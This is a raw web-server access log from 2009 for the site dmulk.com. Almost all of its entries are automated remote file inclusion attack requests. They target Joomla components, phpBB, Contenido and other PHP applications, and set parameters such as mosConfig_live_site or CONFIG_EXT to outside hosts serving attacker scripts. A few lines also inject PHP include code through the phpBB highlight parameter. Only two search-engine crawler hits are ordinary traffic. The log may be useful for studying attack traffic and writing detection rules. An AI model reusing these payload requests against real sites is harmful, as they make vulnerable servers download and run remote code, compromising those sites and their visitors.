218.150.78.201 - - [30/Jan/2009:08:00:05 -0800] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:00:48 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:00:48 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:00:48 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:00:48 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:00:57 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:00:57 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:00:57 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:00:57 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:01:08 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:01:08 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:01:12 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:01:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:01:12 -0800] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:13 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:13 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:13 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:13 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:14 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:14 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:14 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:14 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:01:14 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:01:15 -0800] "GET /logs/access_071225.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:08:01:16 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:08:01:16 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Jan/2009:08:01:17 -0800] "GET /logs/access_080227.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.geocities.com/amosmarkp3/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:37 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:37 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:37 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:37 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:37 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:37 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:37 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:01:37 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:01:53 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:01:53 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:01:53 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:01:54 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:01:56 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:01:56 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:01:56 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:01:59 -0800] "GET /logs/access_071119.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:02:06 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:02:06 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:02:06 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:02:09 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:02:16 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:02:19 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:02:19 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:02:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.21 - - [30/Jan/2009:08:02:19 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:02:24 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:02:26 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:02:26 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:02:28 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:02:45 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:02:45 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:02:46 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:02:49 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.17.179 - - [30/Jan/2009:08:02:51 -0800] "GET /blog/index.php/2008/06/ HTTP/1.0" 200 15732 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:02:56 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:02:56 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:02:56 -0800] "GET /logs/access_071225.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:02:56 -0800] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:02:57 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:02:57 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:02:57 -0800] "GET /logs/access_071225.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:02:57 -0800] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:03:02 -0800] "GET /logs/access_071225.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.226.135 - - [30/Jan/2009:08:03:02 -0800] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:03:03 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:03:03 -0800] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:03:03 -0800] "GET /logs/access_081010.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:03:03 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
70.84.182.98 - - [30/Jan/2009:08:03:06 -0800] "GET /logs/access_081129.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.onlinevine.co.uk//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [30/Jan/2009:08:03:06 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.onlinevine.co.uk//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:03:11 -0800] "GET /logs/access_080824.log/index.php?acao=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:03:11 -0800] "GET /logs/index.php?acao=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:03:11 -0800] "GET /index.php?acao=http://eskipazartarim.gov.tr/uploads/main.js??? HTTP/1.1" 200 94780 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:03:24 -0800] "GET /logs/access_080425.log%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:08:03:26 -0800] "GET /minamijewelry/html/flower.html HTTP/1.0" 200 20956 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:03:28 -0800] "GET /logs/access_080824.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://bigbeebiz.com/orca/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.182.98 - - [30/Jan/2009:08:03:35 -0800] "GET /logs/access_080602.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.onlinevine.co.uk//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:04:28 -0800] "GET /logs/access_080726.log/components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:04:29 -0800] "GET /components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:04:29 -0800] "GET /logs/components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:05:01 -0800] "GET /logs/access_080911.log/components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:05:01 -0800] "GET /components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:05:02 -0800] "GET /logs/access_080824.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://bigbeebiz.com/orca/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:05:02 -0800] "GET /logs/components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:05:38 -0800] "GET /logs/access_080523.log/index.php?incl=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:05:40 -0800] "GET /index.php?incl=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 200 94754 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:05:44 -0800] "GET /logs/index.php?incl=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:05:48 -0800] "GET /logs/access_080719.log/components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:06:11 -0800] "GET /logs/access_080725.log/index.php?incl=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:08:06:14 -0800] "GET /logs/access_080820.log%20//modules/TotalCalendar/about.php?inc_dir=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:06:14 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:06:14 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:06:14 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:06:14 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:06:14 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:06:14 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:06:14 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:06:14 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:06:21 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:06:21 -0800] "GET /logs/access_080806.log/home.php?pagina=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:06:21 -0800] "GET /home.php?pagina=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:06:21 -0800] "GET /logs/home.php?pagina=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.182.98 - - [30/Jan/2009:08:06:41 -0800] "GET /logs/access_081129.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.onlinevine.co.uk//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [30/Jan/2009:08:06:41 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.onlinevine.co.uk//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [30/Jan/2009:08:06:46 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.onlinevine.co.uk//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
